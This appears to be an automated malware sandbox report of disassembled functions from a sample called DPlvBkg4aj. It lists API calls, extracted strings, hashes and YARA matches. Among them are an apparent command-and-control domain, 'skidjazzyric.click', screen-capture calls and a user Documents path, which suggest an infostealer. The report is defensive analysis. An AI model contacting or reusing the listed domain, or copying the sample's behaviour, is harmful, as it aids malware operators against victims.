if, xrefs: 00419B1C
~|, xrefs: 00419B2E

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID: FreeLibrary$InitializeThunk
String ID: ~|$@+p$SP$if$pv$tj$vt
API String ID: 764372645-1164417230
Opcode ID: 6f3e0809db8a7ee577943ce01a0a1cb86fff2ea56a37afda839586e8e533a568
Instruction ID: c1c817f51924b2b6e01bbc71c3bfe870e6f9d21007064de5033cd7ab66586395
Opcode Fuzzy Hash: 6f3e0809db8a7ee577943ce01a0a1cb86fff2ea56a37afda839586e8e533a568
Instruction Fuzzy Hash: 5D624770609310AFE724CB15DC9176BB7E2EFC5314F18862DF495973A1D378AC858B4A

Function 00679AA7 Relevance: 16.7, APIs: 2, Strings: 7, Instructions: 936COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 00679F4E
FreeLibrary.KERNEL32(?), ref: 00679F8B

Strings

if, xrefs: 00679D83
tj, xrefs: 00679E21
SP, xrefs: 00679E59
@+p, xrefs: 00679ACB, 00679BAD, 00679C04, 00679CB8, 00679ECA, 00679EFC, 00679F66, 00679F9F, 0067A01B, 0067A0FA, 0067A1BB, 0067A217, 0067A303, 0067A39C, 0067A442, 0067A599, 0067A619
~|, xrefs: 00679D95
vt, xrefs: 00679D63
pv, xrefs: 00679E19

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: ~|$@+p$SP$if$pv$tj$vt
API String ID: 3664257935-1164417230
Opcode ID: 557abf3bdc5e1b4c31fa4c16cb7a998475db0352c266ee35ae4fbd844e0422db
Instruction ID: 16c75a79f3798f12a667a95bbf84d19aa5a3ad5089e22c39a176b084f2dbb861
Opcode Fuzzy Hash: 557abf3bdc5e1b4c31fa4c16cb7a998475db0352c266ee35ae4fbd844e0422db
Instruction Fuzzy Hash: D262E370609350ABE724CB68C891B6FB7E3EFC5314F28C62CE499973A1D371AC458B56

Function 006860B7 Relevance: 15.5, Strings: 12, Instructions: 458COMMON

Download Yara Rule

Strings

&$, xrefs: 00686907
4D2Z, xrefs: 006865AD
T`Sf, xrefs: 006865F3
(X#^, xrefs: 006865B7
+\1R, xrefs: 006865C1
-T,j, xrefs: 006865D5
qs, xrefs: 006860FD
Wdz, xrefs: 006865FD
$@7F, xrefs: 006865A3
8I>K, xrefs: 00686ABF
2E1G, xrefs: 00686ADD
uVw, xrefs: 00686107

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: $@7F$(X#^$+\1R$-T,j$2E1G$4D2Z$8I>K$T`Sf$Wdz$&$$qs$uVw
API String ID: 0-2419925205
Opcode ID: 7f03e2cf2ff76769e2eca3cb1bafa80f1ab81eb052e5b20bbb5ada621e185149
Instruction ID: 04a372af2dcdb7b261d8c03b0bdffe56b17957394fcf48f86c37a69a3c80f6ff
Opcode Fuzzy Hash: 7f03e2cf2ff76769e2eca3cb1bafa80f1ab81eb052e5b20bbb5ada621e185149
Instruction Fuzzy Hash: F3421BB0905369CFDB64CF56D981BCDBBB1FB05300F1186E8C1996B262DB748A86CF85

Function 00417405 Relevance: 15.1, APIs: 4, Strings: 4, Instructions: 1110COMMON

Download Yara Rule

Strings

~, xrefs: 00418158
@+p, xrefs: 00417586, 0041778D, 00417803
5&'d, xrefs: 004175E5
O, xrefs: 00417625

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: 5&'d$@+p$O$~
API String ID: 0-2318747912
Opcode ID: 19bfc54354d9903b26eacf0161f96faf57e28913ce884c947f78354b466abfc6
Instruction ID: 7c8e188e2ff574dc84e1e58bec60109b2722ae2eee07efcef2931a8160e5a92b
Opcode Fuzzy Hash: 19bfc54354d9903b26eacf0161f96faf57e28913ce884c947f78354b466abfc6
Instruction Fuzzy Hash: AC820F7550C3518BC324CF28C8917ABB7E1FF99314F198A6EE4C99B391E7389941CB4A

Function 004257E0 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 295COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 004258F4
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0042595D

Strings

`J/H, xrefs: 00425826
=^"\, xrefs: 00425ABF
rp, xrefs: 00425834
B"@, xrefs: 00425818
)RSP, xrefs: 004259A1

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: B"@$)RSP$=^"\$`J/H$rp
API String ID: 237503144-816972838
Opcode ID: bf1cafb989073c4553b17663fd8b05ca961829d4f2cee33832e91d81a2f5237f
Instruction ID: cd6e5e946c3164ee33c4da05371f075d598195140dbb1deecb8ac0c04a2143aa
Opcode Fuzzy Hash: bf1cafb989073c4553b17663fd8b05ca961829d4f2cee33832e91d81a2f5237f
Instruction Fuzzy Hash: 9DA110B6E402188FDB10CFA8DC827EEBBB1FF85314F154169E414AB291D7B59942CB94

Function 00427860 Relevance: 11.7, Strings: 9, Instructions: 409COMMON

Download Yara Rule

Strings

JW, xrefs: 004279BD
@+p, xrefs: 00427D1B, 00427DAF
/), xrefs: 00427944
J+, xrefs: 004279D3
r}B, xrefs: 00427D60
3=, xrefs: 0042795C
bX_^, xrefs: 00427C10, 00427C14, 00427D78
]_, xrefs: 004279C8
+5, xrefs: 0042794C

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: @+p$J+$JW$]_$bX_^$r}B$+5$/)$3=
API String ID: 0-4227150729
Opcode ID: 929424e9da50b117192bea9d5fa077e9e13fbba52b5cd1fa525d3b1ff89fed60
Instruction ID: 44c300c69855992b2f16a9d4ad0dfeec6e614c77fc8171f72a5c7ce453eec0d9
Opcode Fuzzy Hash: 929424e9da50b117192bea9d5fa077e9e13fbba52b5cd1fa525d3b1ff89fed60
Instruction Fuzzy Hash: 9FD1DEB461C340DFE7249F25E881B6BB7A2FBC6304F94892DF1858B391DB749805CB5A

Function 0040D545 Relevance: 10.8, APIs: 1, Strings: 6, Instructions: 349COMMON

Download Yara Rule

APIs

Part of subcall function 00436980: GetDC.USER32(00000000), ref: 00436989
Part of subcall function 00436980: GetSystemMetrics.USER32(0000004C), ref: 00436999
Part of subcall function 00436980: GetSystemMetrics.USER32(0000004D), ref: 004369A1
Part of subcall function 00436980: GetCurrentObject.GDI32(00000000,00000007), ref: 004369AA
Part of subcall function 00436980: GetObjectW.GDI32(00000000,00000018,?), ref: 004369BA
Part of subcall function 00436980: DeleteObject.GDI32(00000000), ref: 004369C1
Part of subcall function 00436980: CreateCompatibleDC.GDI32(00000000), ref: 004369D0
Part of subcall function 00436980: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004369DB
Part of subcall function 00436980: SelectObject.GDI32(00000000,00000000), ref: 004369E7
Part of subcall function 00436980: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00436A0A

CoUninitialize.OLE32 ref: 0040D555

Strings

?C*], xrefs: 0040D7A4
~wxH, xrefs: 0040D64F
&W-Q, xrefs: 0040D7B9
9Y, xrefs: 0040D854
|qay, xrefs: 0040D641
skidjazzyric.click, xrefs: 0040D90A

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID: Object$CompatibleCreateMetricsSystem$BitmapCurrentDeleteSelectUninitialize
String ID: &W-Q$9Y$?C*]$skidjazzyric.click$|qay$~wxH
API String ID: 3213364925-1525209810
Opcode ID: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
Instruction ID: aef483f231ee1e61a479db6060b0077f9689b526eef662d52e770a901b229f69
Opcode Fuzzy Hash: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
Instruction Fuzzy Hash: EEB115756047818BE325CF2AC4D0762BBE2FF96300B18C5ADC4D64BB86D738A806CB95

Function 0066D7AC Relevance: 10.8, APIs: 1, Strings: 6, Instructions: 349COMMON

Download Yara Rule

APIs

Part of subcall function 00696BE7: GetDC.USER32(00000000), ref: 00696BF0
Part of subcall function 00696BE7: GetCurrentObject.GDI32(00000000,00000007), ref: 00696C11
Part of subcall function 00696BE7: GetObjectW.GDI32(00000000,00000018,?), ref: 00696C21
Part of subcall function 00696BE7: DeleteObject.GDI32(00000000), ref: 00696C28
Part of subcall function 00696BE7: CreateCompatibleDC.GDI32(00000000), ref: 00696C37
Part of subcall function 00696BE7: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00696C42
Part of subcall function 00696BE7: SelectObject.GDI32(00000000,00000000), ref: 00696C4E
Part of subcall function 00696BE7: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00696C71

CoUninitialize.COMBASE ref: 0066D7BC

Strings

skidjazzyric.click, xrefs: 0066DB71
|qay, xrefs: 0066D8A8
&W-Q, xrefs: 0066DA20
?C*], xrefs: 0066DA0B
9Y, xrefs: 0066DABB
~wxH, xrefs: 0066D8B6

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID: Object$CompatibleCreate$BitmapCurrentDeleteSelectUninitialize
String ID: &W-Q$9Y$?C*]$skidjazzyric.click$|qay$~wxH
API String ID: 3248263802-1525209810
Opcode ID: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
Instruction ID: 71b067a53207eaa203a2a200c2c602f21c994782c6b4fe10ea49473680677ef4
Opcode Fuzzy Hash: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
Instruction Fuzzy Hash: 1AB11775A047818BE725CF2AC4D07A2BBE2FF96304B18C2ACD4D64FB46D734A846CB51

Function 0041C400 Relevance: 10.8, Strings: 8, Instructions: 842COMMON

Download Yara Rule

Strings

C`6f, xrefs: 0041C919
4D"J, xrefs: 0041C8E8
,\/b, xrefs: 0041C912
*H%N, xrefs: 0041C8EF
+P%V, xrefs: 0041C8FD
2T'Z, xrefs: 0041C904
,X0^, xrefs: 0041C90B
C`6f, xrefs: 0041C73C, 0041CBB1, 0041CC7D

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: *H%N$+P%V$,X0^$,\/b$2T'Z$4D"J$C`6f$C`6f
API String ID: 0-102253164
Opcode ID: 7d18ccd7fb329c2f7a5c3569352263da56546af64857bf12c5cea43640fe8961
Instruction ID: 7c24634cc790d3dc5544db0222c0a2221dcce8583ae8b0beabc19f11c9a677e2
Opcode Fuzzy Hash: 7d18ccd7fb329c2f7a5c3569352263da56546af64857bf12c5cea43640fe8961
Instruction Fuzzy Hash: 923202B19402118BCB24CF24CC927A7B7B2FF95314F28829DD851AF395E779A842CBD5

Function 0067C667 Relevance: 10.8, Strings: 8, Instructions: 842COMMON

Download Yara Rule

Strings

,X0^, xrefs: 0067CB72
C`6f, xrefs: 0067C9A3, 0067CE18, 0067CEE4
2T'Z, xrefs: 0067CB6B
+P%V, xrefs: 0067CB64
*H%N, xrefs: 0067CB56
4D"J, xrefs: 0067CB4F
C`6f, xrefs: 0067CB80
,\/b, xrefs: 0067CB79

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: *H%N$+P%V$,X0^$,\/b$2T'Z$4D"J$C`6f$C`6f
API String ID: 0-102253164
Opcode ID: f96fe7a7a370e0a426616b44d01145cf498bc23b6eb0afd2ea812e4552abdc14
Instruction ID: fd20ce2f0bed014eab1058472cb96783a805b45b1a4e42368173bb0ec0ad744b
Opcode Fuzzy Hash: f96fe7a7a370e0a426616b44d01145cf498bc23b6eb0afd2ea812e4552abdc14
Instruction Fuzzy Hash: 483239B19007118BCB24CF28C8927B6B7B2FF95324F28D25CD845AF795E7759902CB91

Function 00668AE7 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 180threadCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00668B0B
GetCurrentThreadId.KERNEL32 ref: 00668B15
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00668BBC
GetForegroundWindow.USER32 ref: 00668BD1
ExitProcess.KERNEL32 ref: 00668D1E

Strings

6W01, xrefs: 00668C1C

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID: 6W01
API String ID: 4063528623-326071965
Opcode ID: bfbdd2f4eb40b0c99f42f083f1dd3dcee64ae0e50d961520efab8e0958816b30
Instruction ID: 8f67d1438ef182b97f5604d7838074f74947d24c4bb3381e1512b176e090e447
Opcode Fuzzy Hash: bfbdd2f4eb40b0c99f42f083f1dd3dcee64ae0e50d961520efab8e0958816b30
Instruction Fuzzy Hash: 78516972A443040FD728AF748C46396BA979BC1310F1BC23D9995AB3E6ED788C0687D5

Function 00420D90 Relevance: 10.5, Strings: 8, Instructions: 470COMMON

Download Yara Rule

Strings

>C;M, xrefs: 00420F2E
>C;M"G3A, xrefs: 004211E3
%K9U, xrefs: 00420F3E
"G3A, xrefs: 00421026
?_%Y, xrefs: 00420F56
?S2], xrefs: 00420F4E
<O)I, xrefs: 00420F36
2W<Q, xrefs: 00420F46

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: "G3A$%K9U$2W<Q$<O)I$>C;M$>C;M"G3A$?S2]$?_%Y
API String ID: 0-2668584225
Opcode ID: d10a81d34372c35a96c2f8986c5506c0c6912e9abd80cece7959baf4c885c2f5
Instruction ID: 1eff8263789fd2a08f3fecf0f268f16acf59bb1ac0ae24da522a1f75b62227ff
Opcode Fuzzy Hash: d10a81d34372c35a96c2f8986c5506c0c6912e9abd80cece7959baf4c885c2f5
Instruction Fuzzy Hash: 28E101756083108BC324CF64C89276BB7F1EFE6314F498A5DE4D69B3A4E3389905CB96

Function 004186FC Relevance: 9.8, Strings: 7, Instructions: 1000COMMON

Download Yara Rule

Strings

]a_c, xrefs: 00418871
+, xrefs: 00418DD8
@+p, xrefs: 00418AEF, 00418B51, 00418BA5, 00418BEF, 00418C71, 00418D6B, 00418FAF, 00419004, 004192AB
NmNo, xrefs: 004188F5
tu, xrefs: 00418829
H)G+, xrefs: 00418852
<, xrefs: 0041913F

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: +$<$@+p$H)G+$NmNo$]a_c$tu
API String ID: 0-1495417939
Opcode ID: 00c84f4a00f370efcd5a995a9a9107818abea52a60fb4f74658ed92934ea930d
Instruction ID: c7a3f77f71ded0b9311dc6516a729683f4fb7c759b6558f4b3eb03d829b5ec1a
Opcode Fuzzy Hash: 00c84f4a00f370efcd5a995a9a9107818abea52a60fb4f74658ed92934ea930d
Instruction Fuzzy Hash: 925216741093509FD724CF28C8917ABB7E1FF86314F184A6DE4D68B391DB38A845CB9A

Function 0040B2B0 Relevance: 9.3, Strings: 7, Instructions: 518COMMON

Download Yara Rule

Strings

fWpQ, xrefs: 0040B397
@w@q, xrefs: 0040B3E4
6C(], xrefs: 0040B382
K{Du, xrefs: 0040B3DA
Bc*}, xrefs: 0040B3C6
`/(), xrefs: 0040B588
?_oY, xrefs: 0040B389

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: 6C(]$?_oY$@w@q$Bc*}$K{Du$`/()$fWpQ
API String ID: 0-74227037
Opcode ID: 38d3abca32f2cf0db45db9bcd24ebb0db54af3e6334d844c9839fcbf09972b5b
Instruction ID: 6cbb9b4a16d706e95eb7c5eb543f19fb0438a443f67131002351f3f2f8f3bf58
Opcode Fuzzy Hash: 38d3abca32f2cf0db45db9bcd24ebb0db54af3e6334d844c9839fcbf09972b5b
Instruction Fuzzy Hash: FA1299B5205B01CFD324CF25D891B97BBF6FB45314F058A2DD5AA8BAA0DB74A406CF84

Function 0043F150 Relevance: 8.0, Strings: 6, Instructions: 524COMMON

Download Yara Rule

Strings

d5fg, xrefs: 0043F1EF
@+p, xrefs: 0043F217, 0043F337, 0043F3D8, 0043F446, 0043F4BD, 0043F7C8
f, xrefs: 0043F3AD
S"(w, xrefs: 0043F220
S"(w, xrefs: 0043F44C
d5fg, xrefs: 0043F195, 0043F1B0

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID: InitializeThunk
String ID: @+p$S"(w$S"(w$d5fg$d5fg$f
API String ID: 2994545307-96514734
Opcode ID: 0d78e0e6ed5534702665f3e437abebaaa5f5fc6afa26a53d6cab4ff82d69c05f
Instruction ID: d96f39f5747abd94facca9cdfd6dc8715fedad9b00cb7f1fec3a1bbed5632043
Opcode Fuzzy Hash: 0d78e0e6ed5534702665f3e437abebaaa5f5fc6afa26a53d6cab4ff82d69c05f
Instruction Fuzzy Hash: E812C575A093519FC724CF18C880B2BB7E1AFC9314F18963EE8A4573A1D775DC098B9A

Function 0069F3B7 Relevance: 8.0, Strings: 6, Instructions: 524COMMON

Download Yara Rule

Strings

d5fg, xrefs: 0069F417, 0069F3FC
d5fg, xrefs: 0069F456
S"(w, xrefs: 0069F487
@+p, xrefs: 0069F47E, 0069F59E, 0069F63F, 0069F6AD, 0069F724, 0069FA2F
S"(w, xrefs: 0069F6B3
f, xrefs: 0069F614

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: @+p$S"(w$S"(w$d5fg$d5fg$f
API String ID: 0-96514734
Opcode ID: 0d95f729ef3d477b1c9e30a1fac3cff8fc80ecb0f431d978f2f91dfa0851ceaa
Instruction ID: bd687b4c3bdc232dcf3d550dfbe5b80690e37d8a53ea83a8a84c77de136e23f6
Opcode Fuzzy Hash: 0d95f729ef3d477b1c9e30a1fac3cff8fc80ecb0f431d978f2f91dfa0851ceaa
Instruction Fuzzy Hash: B812D271A093519FC714CF18C880B6EBBE6AFC9314F19863CE4A49B7A1D771EC058B96

Function 004042B0 Relevance: 8.0, Strings: 6, Instructions: 464COMMON

Download Yara Rule

Strings

), xrefs: 00404337
IHDR, xrefs: 004046AC
IEND, xrefs: 0040478F
erprofile%\Documents, xrefs: 004045D9
), xrefs: 0040432D
IDAT, xrefs: 0040471B

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: )$)$IDAT$IEND$IHDR$erprofile%\Documents
API String ID: 0-2717786661
Opcode ID: f372f4cb5f00298efd3fc4362282583120594c95e814c0bcfa2cf688d961bdd6
Instruction ID: 257f26cc5f2a74aac9bf87ca9c2577b9cb81d69ed2dc1e03b5bd0bdbb9992778
Opcode Fuzzy Hash: f372f4cb5f00298efd3fc4362282583120594c95e814c0bcfa2cf688d961bdd6
Instruction Fuzzy Hash: C302E2B46083848FD704CF29D89176ABBE1EBC6304F14853EEA859B3D1D379D909CB96

Function 00664517 Relevance: 8.0, Strings: 6, Instructions: 464COMMON

Download Yara Rule

Strings

erprofile%\Documents, xrefs: 00664840
), xrefs: 00664594
), xrefs: 0066459E
IHDR, xrefs: 00664913
IDAT, xrefs: 00664982
IEND, xrefs: 006649F6

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: )$)$IDAT$IEND$IHDR$erprofile%\Documents
API String ID: 0-2717786661
Opcode ID: 6404abdd9532a83599bde1e91a6e17757f4bdc3d0c3ecb42acbc60988de959d0
Instruction ID: 0dd0a7321691c853adc9cbe7807166e27c2cabb89491ce2e123cecf8c67320ea
Opcode Fuzzy Hash: 6404abdd9532a83599bde1e91a6e17757f4bdc3d0c3ecb42acbc60988de959d0
Instruction Fuzzy Hash: 4902E1746083848FD704CF29D89176BBBE2EFC6300F14866DE9858B391DB75DA09CB96

Function 0040AE30 Relevance: 7.8, Strings: 6, Instructions: 344COMMON

Download Yara Rule

Strings

}v, xrefs: 0040AED8
Ds, xrefs: 0040AEE8
:33F, xrefs: 0040B0A4
8)*6, xrefs: 0040B064, 0040B1C3, 0040B25C, 0040B084, 0040B1B7, 0040B229, 0040B215, 0040B232
]f, xrefs: 0040B021, 0040B025
8)*6, xrefs: 0040B0B0

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: 8)*6$8)*6$:33F$Ds$]f$}v
API String ID: 0-771823803
Opcode ID: 7a3e19719626faba5c99d689b52e2aeecc2c57281bd7adea87c94ef03e1a3679
Instruction ID: 415c6ff438417329eae15ed8e7d658c137838348542c9c9b1d71c747cb23f456
Opcode Fuzzy Hash: 7a3e19719626faba5c99d689b52e2aeecc2c57281bd7adea87c94ef03e1a3679
Instruction Fuzzy Hash: 88B1F67520C3408BD324CF6884546AFBBE1EFD2304F18896DE8D56B391D779890ACB9E

Function 0066B097 Relevance: 7.8, Strings: 6, Instructions: 344COMMON

Download Yara Rule

Strings

]f, xrefs: 0066B288, 0066B28C
:33F, xrefs: 0066B30B
8)*6, xrefs: 0066B317
8)*6, xrefs: 0066B41E, 0066B490, 0066B47C, 0066B2CB, 0066B42A, 0066B2EB, 0066B499, 0066B4C3
Ds, xrefs: 0066B14F
}v, xrefs: 0066B13F

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: 8)*6$8)*6$:33F$Ds$]f$}v
API String ID: 0-771823803
Opcode ID: 50f1edfc2bafa0014d11b6723b84b375855532d8b2d3c37a471b1a8907bb870b
Instruction ID: bd740b287b59af5ccc2594ce531ad7955c172c40cdf1851a0cf2a7440cfc38ef
Opcode Fuzzy Hash: 50f1edfc2bafa0014d11b6723b84b375855532d8b2d3c37a471b1a8907bb870b
Instruction Fuzzy Hash: EEB1247520C390CBC324CF6984506AFBBE2AFC2314F58982CE8D59B356DB75C90ACB56

Function 00425AF0 Relevance: 7.8, Strings: 6, Instructions: 289COMMON

Download Yara Rule

Strings

=^"\, xrefs: 00425ABF
C@, xrefs: 00425C40
B:, xrefs: 00425C36
)RSP, xrefs: 004259A1
K3, xrefs: 00425C4A
bX_^, xrefs: 00425BBD

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: )RSP$=^"\$B:$C@$K3$bX_^
API String ID: 0-3030200349
Opcode ID: b7b7d5e1b28ee3cbee9031abf066d5bdbea60043203f55f78b2bc464f190e4c2
Instruction ID: 361e1606381cfafdf419846c5dd42b56ab67650ac9a68572a77bc4f7112e5621
Opcode Fuzzy Hash: b7b7d5e1b28ee3cbee9031abf066d5bdbea60043203f55f78b2bc464f190e4c2
Instruction Fuzzy Hash: 77B120B6E002288FDB20CF68DC427DEBBB1FB85314F1981A9E418AB351D7785D468F91

Function 00428437 Relevance: 6.7, Strings: 5, Instructions: 469COMMON

Download Yara Rule

Strings

J'N!, xrefs: 00428B3B
LMR|, xrefs: 00428848
vu~r, xrefs: 00428868
"#, xrefs: 00428B43
H}}C, xrefs: 00428850

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: "#$H}}C$J'N!$LMR|$vu~r
API String ID: 0-1530353048
Opcode ID: 8f0a109eb01666b980d5d4ea6aa88c69ad077d8ae26429a0f6b9f90d2ad26799
Instruction ID: 7cb9c3f936be8fd3a75d1e4abfb2bd6291e29c03686ec294c1ddfd7f13708a2f
Opcode Fuzzy Hash: 8f0a109eb01666b980d5d4ea6aa88c69ad077d8ae26429a0f6b9f90d2ad26799
Instruction Fuzzy Hash: 0DE16CB5608351CFC7108F24A84126FB7E1AF96308F58487EE8C597342DB39DC05CB5A

Function 004092A0 Relevance: 6.7, Strings: 5, Instructions: 452COMMON

Download Yara Rule

Strings

!oW1, xrefs: 004093CA
P, xrefs: 0040948B
C, xrefs: 0040960D
#"2., xrefs: 004093C2
RRP\, xrefs: 0040973E

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: !oW1$#"2.$C$P$RRP\
API String ID: 0-2182630447
Opcode ID: 9e5b2cc2ab5d07adaa8a414532c7643901df2a50596dff6e5731d4bc268ab305
